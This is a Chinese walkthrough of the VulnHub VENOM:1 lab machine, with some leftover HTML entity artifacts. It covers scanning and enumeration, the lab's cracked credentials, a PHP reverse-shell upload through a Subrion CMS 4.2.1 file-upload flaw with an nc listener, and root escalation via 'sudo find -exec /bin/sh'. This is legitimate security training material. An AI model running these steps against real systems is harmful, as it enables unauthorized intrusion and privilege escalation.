vulnhub之VENOM:1

1.信息收集

输入arp-scan 192.168.239.0/24探测存活的IP

使用nmap对192.168.239.166进行扫描&＃xff0c;发现IP端口21、80、139、443、445。

在浏览器上访问http://192.168.239.166/&＃xff0c;查看源码发现类似md5加密。

解密md5可以得到为hostinger。

输入enum4linux 192.168.239.166&＃xff0c;进行SMB探测&＃xff0c;可发现存在nathan、hostinger两个用户。

使用上述两个用户登录ftp&＃xff0c;发现hostinger\hostinger可以登录成功&＃xff0c;并发现存在hint.txt文件。

使用get hint.txt下载文件&＃xff0c;并查看文件可得用户名为dora

解密可知为&＃xff1a;E7r9t8&＃64;Q#h%Hy&＃43;M1234。

2.漏洞利用

将venom.box加入/etc/hosts文件中&＃xff0c;并访问http://venom.box/panel/&＃xff0c;发现为Subrion CMS v4.2.1。

使用searchsploit Subrion CMS搜索发现存在文件上传漏洞

上网查询&＃xff0c;可以看到Subrion CMS 4.2.1的上传漏洞为&＃xff0c;后缀名可以是phar或pht。

并输入用户名\密码&＃xff0c;dora\E7r9t8&＃64;Q#h%Hy&＃43;M1234登录成功&＃xff0c;并上传自己木马。

本地监听nc -lvvp 1234&＃xff0c;浏览器访问&＃xff1a;http://venom.box/upload/php-reverse-shell.phar&＃xff0c;反弹成功。

3.权限提升

切换用户为&＃xff1a;hostinger

查看hostinger用户目录下无有用信息。

查看/var/www/html/subrion/backup&＃xff0c;下存在.htaccess文件&＃xff0c;打开发现类似于密码。

切换nathan用户&＃xff0c;发现存在sudo提权&＃xff0c;但禁止了su。

执行sudo id发现提权成功。

执行find / -perm -u&＃61;s -type f 2>/dev/null&＃xff0c;发现存在SUID&＃xff0c;find提权。

执行sudo find . -exec /bin/sh ; -quit&＃xff0c;提权成功。